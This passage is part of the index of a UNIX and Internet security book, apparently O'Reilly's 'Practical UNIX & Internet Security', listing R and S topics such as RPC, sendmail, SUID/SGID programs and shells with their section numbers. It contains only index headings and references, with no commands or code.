UUCP access from : 15.4.2.1. Some bad examples<br />

root option for /etc/exports : 20.2.1.1. /etc/exports<br />

ROT13 algorithm<br />

6.4.1. Summary of Private Key Systems<br />

6.4.3. ROT13: Great for Encoding Offensive Jokes<br />

rotating backup media<br />

7.1.3. Types of Backups<br />

7.2.1.2. Media rotation<br />

routed daemon : 17.3.19. Routing <strong>Internet</strong> Protocol (RIP routed) (UDP Port 520)<br />

routers, intelligent : 21.2.3. Setting Up the Choke<br />

routing : 16.2.2. Routing<br />

Routing <strong>Internet</strong> Protocol : (see RIP)<br />

RPC table (NIS+) : 19.5.3. NIS+ Tables<br />

rpc.rexdserver : 17.3.22. RPC rpc.rexd (TCP Port 512)<br />

rpcbind : (see portmapper program)<br />

RPCs (remote procedure calls)<br />

17.3.22. RPC rpc.rexd (TCP Port 512)<br />

19. RPC, NIS, NIS+, and Kerberos<br />

19.7.2. SESAME<br />

authentication of<br />

19.2.2. RPC Authentication<br />

19.2.2.4. AUTH_KERB<br />

portmapper program : 17.3.11. Sun RPC's portmapper (UDP and TCP Ports 111)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_r.htm (6 of 7) [2002-04-12 10:43:55]


Index<br />

<strong>Sec</strong>ure : (see <strong>Sec</strong>ure RPC)<br />

spoofing : 19.4.4.4. Spoofing RPC<br />

RS-232 serial protocol : 14.3. The RS-232 Serial Protocol<br />

RSA algorithm<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

6.5.3. Digital Signatures<br />

rsh (restricted shell)<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

17.3.18.6. /etc/hosts.lpd file<br />

rsh command : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

rshd program : 11.1.2. Back Doors and Trap Doors<br />

RUID : (see real UIDs/GIDs)<br />

runacct command : 10.2. The acct/pacct Process Accounting File<br />

ruusend command : 15.4.3. L.cmds: Providing Remote Command Execution<br />

rw option for /etc/exports : 20.2.1.1. /etc/exports<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_r.htm (7 of 7) [2002-04-12 10:43:55]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: S<br />

S/Key codebook scheme : 8.7.3. Code Books<br />

sa command : 10.2. The acct/pacct Process Accounting File<br />

sabotage : (see terrorism; vandalism)<br />

salt<br />

8.6.2. What Is Salt?<br />

8.6.3. What the Salt Doesn't Do<br />

sanitizing media : 12.3.2.3. Sanitize your media before disposal<br />

SATAN package<br />

17.6.1. SATAN<br />

E.4.7. SATAN<br />

savacct file : 10.2. The acct/pacct Process Accounting File<br />

saved UID : 4.3.2. Saved IDs<br />

saving backup media<br />

7.1.5. How Long Should You Keep a Backup?<br />

(see also archiving information; backups)<br />

sbrk command : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

scanf function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

scanning networks : 17.6. Network Scanning<br />

SCCS (Source Code Control System)<br />

7.3.2. Building an Automatic Backup System<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

Scherbius, Arthur : 6.3. The Enigma Encryption System<br />

screen savers : 12.3.5.2. X screen savers<br />

screens, multiple : 12.3.4.3. Multiple screens<br />

script command : 24.1.2. Rule #2: DOCUMENT<br />

scripts, CGI : (see CGI, scripts)<br />

scytales : 6.1. A Brief History of Cryptography<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (1 of 20) [2002-04-12 10:43:58]


Index<br />

search warrants<br />

26.2.4. Hazards of Criminal Prosecution<br />

26.2.5. If You or One of Your Employees Is a Target of an Investigation...<br />

searching for .rhosts file : 17.3.18.5. Searching for .rhosts files<br />

Seberry, Jennifer : 6.5.4.3. HAVAL<br />

secrecy, Kerberos : 19.6.1.3. Authentication, data integrity, and secrecy<br />

secret keys : 6.4.6. RSA and Public Key Cryptography<br />

<strong>Sec</strong>ret Service, U.S.<br />

26.2.2. Federal Jurisdiction<br />

F.3.3. U.S. <strong>Sec</strong>ret Service (USSS)<br />

<strong>Sec</strong>ure Hash Algorithm (SHA)<br />

6.5.3. Digital Signatures<br />

6.5.4.2. SHA<br />

<strong>Sec</strong>ure HTTP : 18.4.1. Eavesdropping Over the Wire<br />

<strong>Sec</strong>ure NFS : 19.3.2.4. Using <strong>Sec</strong>ure NFS<br />

-secure option<br />

19.3.2.4. Using <strong>Sec</strong>ure NFS<br />

19.4.4.5. Spoofing NIS<br />

secure option for /etc/exports : 20.2.1.1. /etc/exports<br />

<strong>Sec</strong>ure RPC<br />

19.3. <strong>Sec</strong>ure RPC (AUTH_DES)<br />

19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

with NIS/NIS+<br />

19.3.2. Setting Up <strong>Sec</strong>ure RPC with NIS<br />

19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

NTP and : 19.3.1.3. Setting the window<br />

reauthentication : 19.3.1.3. Setting the window<br />

versus Kerberos : 19.6.2. Kerberos vs. <strong>Sec</strong>ure RPC<br />

<strong>Sec</strong>ure Socket Layer : (see SSL)<br />

secure terminals : 8.5.1. <strong>Sec</strong>ure Terminals<br />

<strong>Sec</strong>ureID : 8.7.2. Token Cards<br />

<strong>Sec</strong>ureNet key : 8.7.2. Token Cards<br />

security<br />

2.1. Planning Your <strong>Sec</strong>urity Needs<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (2 of 20) [2002-04-12 10:43:58]


Index<br />

9.1.2. Read-only Filesystems<br />

12.1.1. The Physical <strong>Sec</strong>urity Plan<br />

(see also integrity; physical security; system administration; threats)<br />

of CGI scripts<br />

18.2.3. Writing <strong>Sec</strong>ure CGI Scripts and Programs<br />

18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

changed detection<br />

9.2. Detecting Change<br />

9.3. A Final Note<br />

checking arguments : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

critical messages to log<br />

10.5.3. syslog Messages<br />

10.5.3.1. Beware false log entries<br />

cryptography<br />

6. Cryptography<br />

6.7.2. Cryptography and Export Controls<br />

definition of : 1.1. What Is Computer <strong>Sec</strong>urity?<br />

digital signatures : (see digital signatures)<br />

disabling finger : 17.3.8.2. Disabling finger<br />

disk quotas : 25.2.2.5. Using quotas<br />

dormant accounts, finding : 8.4.3. Finding Dormant Accounts<br />

drills : 24.1.3. Rule #3: PLAN AHEAD<br />

/etc/passwd : (see /etc/group file; /etc/passwd file)<br />

firewalls : (see firewalls)<br />

four steps toward : 2.4.4.7. Defend in depth<br />

guessable passwords<br />

3.6.1. Bad Passwords: Open Doors<br />

3.6.4. Passwords on Multiple Machines<br />

identification protocol : 17.3.12. Identification Protocol (auth) (TCP Port 113)<br />

improving DES algorithm<br />

6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

IP<br />

6.4.5.2. Triple DES<br />

16.3. IP <strong>Sec</strong>urity<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (3 of 20) [2002-04-12 10:43:58]


Index<br />

16.3.3. Authentication<br />

laws and : (see laws)<br />

legal liability<br />

26.4. Other Liability<br />

26.4.7. Harassment, Threatening Communication, and Defamation<br />

levels of NIS+ servers : 19.5.5. NIS+ Limitations<br />

link-level : 16.3.1. Link-level <strong>Sec</strong>urity<br />

message digests : (see message digests)<br />

modems and<br />

14.4. Modems and <strong>Sec</strong>urity<br />

14.4.4.2. Protection against eavesdropping<br />

monitoring : (see logging)<br />

multilevel (defense in depth)<br />

1.3. History of <strong>UNIX</strong><br />

2.4.4.7. Defend in depth<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

17.2. Controlling Access to Servers<br />

name service and : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

national : 26.2.2. Federal Jurisdiction<br />

network services<br />

17.4. <strong>Sec</strong>urity Implications of Network Services<br />

19.1. <strong>Sec</strong>uring Network Services<br />

passwords<br />

3.2. Passwords<br />

3.8. Summary<br />

personnel<br />

13. Personnel <strong>Sec</strong>urity<br />

13.3. Outsiders<br />

A.1.1.12. Chapter 13: Personnel <strong>Sec</strong>urity<br />

policy of<br />

1.2. What Is an Operating System?<br />

2. Policies and Guidelines<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

protecting backups<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (4 of 20) [2002-04-12 10:43:58]


Index<br />

7.1.6. <strong>Sec</strong>urity for Backups<br />

7.1.6.3. Data security for backups<br />

published resources on<br />

D. Paper Sources<br />

D.2. <strong>Sec</strong>urity Periodicals<br />

responding to breakins<br />

24. Discovering a Break-in<br />

24.7. Damage Control<br />

restricting login : 8.3. Restricting Logins<br />

.rhosts : (see .rhosts file)<br />

sendmail problems : 17.3.4.1. sendmail and security<br />

Skipjack algorithm : 6.4.1. Summary of Private Key Systems<br />

SNMP and : 17.3.15. Simple Network Management Protocol (SNMP) (UDP Ports 161 and 162)<br />

software piracy : 26.4.2.1. Software piracy and the SPA<br />

standards of : 2.4.2. Standards<br />

superuser problems : 4.2.1.5. The problem with the superuser<br />

through obscurity<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

18.2.4. Keep Your Scripts <strong>Sec</strong>ret!<br />

tools for : 11.1. Programmed Threats: Definitions<br />

Tripwire package<br />

9.2.4. Tripwire<br />

9.2.4.2. Running Tripwire<br />

<strong>UNIX</strong> and<br />

1. Introduction<br />

1.4. <strong>Sec</strong>urity and <strong>UNIX</strong><br />

1.4.3. Add-On Functionality Breeds Problems<br />

user awareness of<br />

1.4.1. Expectations<br />

2. Policies and Guidelines<br />

2.4.4.4. Concentrate on education<br />

13.2.2. Ongoing Training and Awareness<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (5 of 20) [2002-04-12 10:43:58]


Index<br />

UUCP : (see UUCP)<br />

weakness-finding tools : 11.1.1. <strong>Sec</strong>urity Tools<br />

World Wide Web<br />

18. WWW <strong>Sec</strong>urity<br />

18.7. Summary<br />

X Window System<br />

17.3.21.2. X security<br />

17.3.21.3. The xhost facility<br />

<strong>Sec</strong>urity Emergency Response Team (SERT) : F.3.4.4. Australia: <strong>Internet</strong> .au domain<br />

security file (UUCP) : 10.3.4. uucp Log Files<br />

security holes<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

(see also back doors; threats)<br />

ftpd program : 6.5.2. Using Message Digests<br />

mailing list for : E.1.3.3. Bugtraq<br />

reporting : 2.5.1. Going Public<br />

ruusend in L.cmds file : 15.4.3. L.cmds: Providing Remote Command Execution<br />

SUID/SGID programs : 5.5.3.1. write: Example of a possible SUID/SGID security hole<br />

/usr/lib/preserve : 5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

UUCP : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

sed scripts : 11.1.4. Trojan Horses<br />

seeds, random number<br />

23.6. Tips on Generating Random Numbers<br />

23.8. Picking a Random Seed<br />

select system call : 17.1.3. The /etc/inetd Program<br />

selection lists : 18.2.3.1. Do not trust the user's browser!<br />

self-destruct sequences : 27.2.1. Hardware Bugs<br />

SENDFILES= command<br />

15.5.1.3. A Sample Permissions file<br />

15.5.2. Permissions Commands<br />

sendmail<br />

11.1.2. Back Doors and Trap Doors<br />

11.5.2.5. .forward, .procmailrc<br />

11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (6 of 20) [2002-04-12 10:43:58]


Index<br />

17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

17.3.4.3. Improving the security of Berkeley sendmail V8<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

(see also mail)<br />

aliases : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

determining version of : 17.3.4.1. sendmail and security<br />

.forward file : 24.4.1.6. Changes to startup files<br />

improving Version 8 : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

logging to syslog : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

same <strong>Internet</strong>/NIS domain : 19.4.3. NIS Domains<br />

security problems with : 17.3.4.1. sendmail and security<br />

sendmail.cf file : 17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

sensors : (see detectors)<br />

separation of duties : 13.2.5. Least Privilege and Separation of Duties<br />

sequence of commands : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

serial interfaces : 14.2. Serial Interfaces<br />

Serial Line <strong>Internet</strong> Protocol (SLIP) : 14.5. Modems and <strong>UNIX</strong><br />

serial numbers, logging : 10.7.1.2. Informational material<br />

SERT (<strong>Sec</strong>urity Emergency Response Team) : F.3.4.4. Australia: <strong>Internet</strong> .au domain<br />

server-side includes<br />

18.2.2.2. Additional configuration issues<br />

18.3.2. Commands Within the Block<br />

servers<br />

16.2.5. Clients and Servers<br />

17.1. Understanding <strong>UNIX</strong> <strong>Internet</strong> Servers<br />

17.1.3. The /etc/inetd Program<br />

backing up : 7.2.2. Small Network of Workstations and a Server<br />

checklist for bringing up : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

controlling access to : 17.2. Controlling Access to Servers<br />

ftp : (see FTP)<br />

http : (see http server)<br />

load shedding : 23.3. Tips on Writing Network Programs<br />

master/slave : (see NIS)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (7 of 20) [2002-04-12 10:43:58]


Index<br />

NIS+, security levels of : 19.5.5. NIS+ Limitations<br />

overloading with requests : 25.3.1. Service Overloading<br />

setting up for FTP<br />

17.3.2.4. Setting up an FTP server<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

web : (see web servers)<br />

WN : 18.3. Controlling Access to Files on Your Server<br />

Xauthority : 17.3.21.4. Using Xauthority magic cookies<br />

service overloading : 25.3.1. Service Overloading<br />

services file : 17.1.1. The /etc/services File<br />

Services table (NIS+) : 19.5.3. NIS+ Tables<br />

SESAME (<strong>Sec</strong>ure European System for Applications in a Multivendor Environment) : 19.7.2. SESAME<br />

session<br />

hijacking : 17.3.3. TELNET (TCP Port 23)<br />

IDs<br />

keys<br />

4.3.3. Other IDs<br />

setgid function<br />

4.3.3. Other IDs<br />

C.1.3.4. Process groups and sessions<br />

6.4. Common Cryptographic Algorithms<br />

19.3.1.1. Proving your identity<br />

23.4. Tips on Writing SUID/SGID Programs<br />

setpgrp function : C.1.3.4. Process groups and sessions<br />

setrlimit function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

setsid function : C.1.3.4. Process groups and sessions<br />

setuid file : 4.3.1. Real and Effective UIDs<br />

setuid function : 23.4. Tips on Writing SUID/SGID Programs<br />

setuid/setgid : (see SUID/SGID programs)<br />

SGID bit<br />

5.5.1. SUID, SGID, and Sticky Bits<br />

5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

(see also SUID/SGID programs)<br />

clearing with chown : 5.7. chown: Changing a File's Owner<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (8 of 20) [2002-04-12 10:43:58]


Index<br />

on directories : 5.5.6. SGID and Sticky Bits on Directories<br />

on files : 5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

SGID files : B.3.2.2. SGID files<br />

sh (Bourne shell)<br />

11.5.1. Shell Features<br />

C.5.3. Running the User's Shell<br />

(see also shells)<br />

sh program : 5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

SUID and : 5.5.2. Problems with SUID<br />

SHA (<strong>Sec</strong>ure Hash Algorithm)<br />

6.5.3. Digital Signatures<br />

6.5.4.2. SHA<br />

shadow file<br />

8.1.1. Accounts Without Passwords<br />

8.8.5. Shadow Password Files<br />

shadow passwords<br />

3.2.1. The /etc/passwd File<br />

8.4.1. Changing an Account's Password<br />

8.8.5. Shadow Password Files<br />

Shamir, Adi<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

shar format file : 11.1.4. Trojan Horses<br />

shareware : 27.2.2. Viruses on the Distribution Disk<br />

shell escapes<br />

8.1.3. Accounts That Run a Single Command<br />

8.1.4.6. Potential problems with rsh<br />

in L.cmds list : 15.4.3. L.cmds: Providing Remote Command Execution<br />

shell scripts, SUID<br />

5.5.3. SUID Shell Scripts<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

shells<br />

1.2. What Is an Operating System?<br />

3.2.1. The /etc/passwd File<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (9 of 20) [2002-04-12 10:43:58]


Index<br />

11.1.4. Trojan Horses<br />

11.5.1. Shell Features<br />

11.5.1.4. Filename attacks<br />

C.2. Creating Processes<br />

C.5.3. Running the User's Shell<br />

changing<br />

8.4.2. Changing the Account's Login Shell<br />

8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

history files : 10.4.1. Shell History<br />

one-command accounts : 8.1.3. Accounts That Run a Single Command<br />

restricted (rsh, ksh)<br />

8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

8.1.4.6. Potential problems with rsh<br />

UUCP : (see uucico program)<br />

shells file : 8.4.2. Changing the Account's Login Shell<br />

Shimomura, Tsutomu : 23.3. Tips on Writing Network Programs<br />

shoulder surfing<br />

3.2.4. Passwords Are a Shared <strong>Sec</strong>ret<br />

5.5.2. Problems with SUID<br />

shredders : 12.3.3. Other Media<br />

SHTTP : (see <strong>Sec</strong>ure HTTP)<br />

shutdowns and wtmp file : 10.1.3. last Program<br />

SIGHUP signal : C.4. The kill Command<br />

SIGKILL signal : C.4. The kill Command<br />

Signal Ground (SG) : 14.3. The RS-232 Serial Protocol<br />

signal grounding : 25.3.3. Signal Grounding<br />

signals : C.3. Signals<br />

signature : 9.2. Detecting Change<br />

signatures : (see digital signatures)<br />

SIGSTOP signal : C.4. The kill Command<br />

SIGTERM signal : 25.2.1.1. Too many processes<br />

Simple Mail Transfer Protocol (SMTP)<br />

17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

17.3.4.3. Improving the security of Berkeley sendmail V8<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (10 of 20) [2002-04-12 10:43:58]


Index<br />

Simple Network Management Protocol : (see SNMP)<br />

single-user mode : C.5.1. Process #1: /etc/init<br />

Skipjack algorithm : 6.4.1. Summary of Private Key Systems<br />

slash (/)<br />

IFS separator : 11.5.1.2. IFS attacks<br />

root directory<br />

5.1.1. Directories<br />

(see also root directory)<br />

Slave mode (uucico) : 15.1.4. How the UUCP Commands Work<br />

slave server<br />

19.4. Sun's Network Information Service (NIS)<br />

(see also NIS)<br />

SLIP (Serial Line <strong>Internet</strong> Protocol)<br />

14.5. Modems and <strong>UNIX</strong><br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

Small Business Community Nationwide (SBA CERT) : F.3.4.31. Small Business Association (SBA):<br />

small business community nationwide<br />

smap program : 17.3.4.1. sendmail and security<br />

smart cards, firewalls : 21.5. Special Considerations<br />

smit tool : 8.8.2. Constraining Passwords<br />

smoke and smoking : 12.2.1.2. Smoke<br />

SMTP (Simple Mail Transfer Protocol)<br />

17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

17.3.4.3. Improving the security of Berkeley sendmail V8<br />

SNA (System Network Architecture) : 16.4.2. SNA<br />

SNEFRU algorithm : 6.5.4.4. SNEFRU<br />

sniffers<br />

1.4.3. Add-On Functionality Breeds Problems<br />

3. Users and Passwords<br />

8.7. One-Time Passwords<br />

17.3.3. TELNET (TCP Port 23)<br />

(see also eavesdropping)<br />

network : 16.3. IP <strong>Sec</strong>urity<br />

packet : 16.3.1. Link-level <strong>Sec</strong>urity<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (11 of 20) [2002-04-12 10:43:58]


Index<br />

SNMP (Simple Network Management Protocol) : 17.3.15. Simple Network Management Protocol<br />

(SNMP) (UDP Ports 161 and 162)<br />

snoop program : 24.2.3. Monitoring the Intruder<br />

SOCKS : E.4.8. SOCKS<br />

soft disk quotas : 25.2.2.5. Using quotas<br />

software<br />

for backups<br />

7.4. Software for Backups<br />

7.4.7. inode Modification Times<br />

bugs in : (see bugs)<br />

for checking integrity : 19.5.5. NIS+ Limitations<br />

checking new<br />

8.1.5.2. Checking new software<br />

11.1.2. Back Doors and Trap Doors<br />

consistency of : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

distributing : (see FTP)<br />

exporting : 26.4.1. Munitions Export<br />

failure of : 7.1.1.1. A taxonomy of computer failures<br />

hacker challenges : 27.2.4. Hacker Challenges<br />

logic bombs : 11.1.3. Logic Bombs<br />

operating system : (see operating systems)<br />

patches for, logging : 10.7.2.2. Informational material<br />

quality of<br />

1.4.2. Software Quality<br />

1.4.3. Add-On Functionality Breeds Problems<br />

stolen (pirated)<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

26.4.2.1. Software piracy and the SPA<br />

stored via FTP : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

testing : 1.4.2. Software Quality<br />

vendor license agreements : 18.5.2. Trusting Your Software Vendor<br />

viruses : 11.1.5. Viruses<br />

worms : 11.1.6. Worms<br />

software patents : 6.7.1. Cryptography and the U.S. Patent System<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (12 of 20) [2002-04-12 10:43:58]


Index<br />

Software Publishers Association (SPA) : 26.4.2.1. Software piracy and the SPA<br />

Software <strong>Sec</strong>urity Response Team (SSRT) : F.3.4.9. Digital Equipment Corporation and customers<br />

Solaris<br />

1.3. History of <strong>UNIX</strong><br />

8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

/etc/logindevperm : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

process limit : 25.2.1.1. Too many processes<br />

<strong>Sec</strong>ure RPC time window : 19.3.1.3. Setting the window<br />

/var/adm/loginlog file : 10.1.4. loginlog File<br />

wtmpx file : 10.1.2. utmp and wtmp Files<br />

Source Code Control System (SCCS) : 7.3.2. Building an Automatic Backup System<br />

source code, keeping secret : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

SPA (Software Publishers Association) : 26.4.2.1. Software piracy and the SPA<br />

Spaf's first principle : 2.4.4.5. Have authority commensurate with responsibility<br />

spies<br />

11.3. Authors<br />

14.4.4.1. Kinds of eavesdropping<br />

spoofing : 16.3. IP <strong>Sec</strong>urity<br />

network connection : 8.5.3.1. Trusted path<br />

network services : 17.5. Monitoring Your Network with netstat<br />

NIS : 19.4.4.5. Spoofing NIS<br />

RPCs : 19.4.4.4. Spoofing RPC<br />

spool file : 15.1.4. How the UUCP Commands Work<br />

spoolers, printer : 12.3.4.1. Printer buffers<br />

sprinkler systems<br />

12.2.1.1. Fire<br />

(see also water)<br />

Sprint response team : F.3.4.32. Sprint<br />

sprintf function<br />

23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

sscanf function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

SSL (<strong>Sec</strong>ure Socket Layer) : 18.4.1. Eavesdropping Over the Wire<br />

SSRT (Software <strong>Sec</strong>urity Response Team) : F.3.4.9. Digital Equipment Corporation and customers<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (13 of 20) [2002-04-12 10:43:58]


Index<br />

Stallman, Richard : 1. Introduction<br />

start bit<br />

14.1. Modems: Theory of Operation<br />

14.2. Serial Interfaces<br />

startup command : 10.2.1. Accounting with System V<br />

startup files<br />

attacks via<br />

11.5.2. Start-up File Attacks<br />

11.5.2.7. Other initializations<br />

intruder's changes to : 24.4.1.6. Changes to startup files<br />

stat function : 5.4. Using Directory Permissions<br />

state law enforcement : 26.2.1. The Local Option<br />

stateless : 20.1.4.3. Connectionless and stateless<br />

static electricity : 12.2.1.8. Electrical noise<br />

static links : 23.4. Tips on Writing SUID/SGID Programs<br />

stdio : (see portable I/O library)<br />

Steele, Guy L. : 1. Introduction<br />

sticky bits : 5.5.1. SUID, SGID, and Sticky Bits<br />

on directories : 5.5.6. SGID and Sticky Bits on Directories<br />

stolen property : (see theft)<br />

stop bit<br />

14.1. Modems: Theory of Operation<br />

14.2. Serial Interfaces<br />

storage<br />

12.3.4. Protecting Local Storage<br />

12.3.4.5. Function keys<br />

strcpy routine : 23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

streadd function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

strecpy function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

strength, cryptographic : 6.2.3. Cryptographic Strength<br />

of DES algorithm<br />

6.4.4.3. DES strength<br />

6.4.5.2. Triple DES<br />

of RSA algorithm : 6.4.6.3. Strength of RSA<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (14 of 20) [2002-04-12 10:43:58]


Index<br />

string command : 12.3.5.2. X screen savers<br />

strtrns function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

su command<br />

4.2.1.2. Superuser is not for casual use<br />

4.3. su: Changing Who You Claim to Be<br />

4.3.8. Other Uses of su<br />

becoming superuser : 4.3.4. Becoming the Superuser<br />

log of failed attempts : 4.3.7. The Bad su Log<br />

sulog file<br />

10.1. The Basic Log Files<br />

10.3.2. sulog Log File<br />

utmp and wtmp files and : 10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

subnetting : 16.2.1.2. Classical network addresses<br />

substitution (in encryption) : 6.1.2. Cryptography and Digital Computers<br />

SUID/SGID programs<br />

4.3.1. Real and Effective UIDs<br />

5.5. SUID<br />

5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

B.3. SUID and SGID Files<br />

back door via : 11.1.2. Back Doors and Trap Doors<br />

chown command and : 5.7. chown: Changing a File's Owner<br />

chroot call and : 8.1.5.2. Checking new software<br />

created by intruders : 24.4.1.3. New SUID and SGID files<br />

on directories : 5.5.6. SGID and Sticky Bits on Directories<br />

disabling (turning off) : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

finding all files<br />

5.5.4. Finding All of the SUID and SGID Files<br />

5.5.4.1. The ncheck command<br />

shell scripts<br />

5.5.3. SUID Shell Scripts<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

uucp access : 15.3. UUCP and <strong>Sec</strong>urity<br />

writing : 23.4. Tips on Writing SUID/SGID Programs<br />

SUID/SGID programs:writing:programming:writing:zzz] : 23. Writing <strong>Sec</strong>ure SUID and Network<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (15 of 20) [2002-04-12 10:43:58]


Index<br />

Programs<br />

suing : (see civil actions)<br />

sulog file<br />

4.3.7. The Bad su Log<br />

10.3.2. sulog Log File<br />

sum command<br />

6.5.5.1. Checksums<br />

9.2.3. Checksums and Signatures<br />

Sun Microsystem's NIS : (see NIS)<br />

Sun Microsystems : F.3.4.34. Sun Microsystems customers<br />

SUN-DES-1 authentication : 17.3.21.3. The xhost facility<br />

SunOS operating system : 1.3. History of <strong>UNIX</strong><br />

authdes_win variable : 19.3.1.3. Setting the window<br />

/etc/fbtab file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

TFTP sand : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

trusted hosts and : 17.3.18.5. Searching for .rhosts files<br />

superencryption : 6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

superuser<br />

4. Users, Groups, and the Superuser<br />

4.2.1. The Superuser<br />

4.2.1.5. The problem with the superuser<br />

(see also root account)<br />

abilities of : 27.1.3. What the Superuser Can and Cannot Do<br />

becoming with su : 4.3.4. Becoming the Superuser<br />

changing passwords<br />

8.4.1. Changing an Account's Password<br />

8.8.8. Disabling an Account by Changing Its Password<br />

encryption and : 6.2.4. Why Use Encryption with <strong>UNIX</strong>?<br />

logging attempts to become : (see sulog file)<br />

problems with : 4.2.1.5. The problem with the superuser<br />

restrictions on : 4.2.1.4. What the superuser can't do<br />

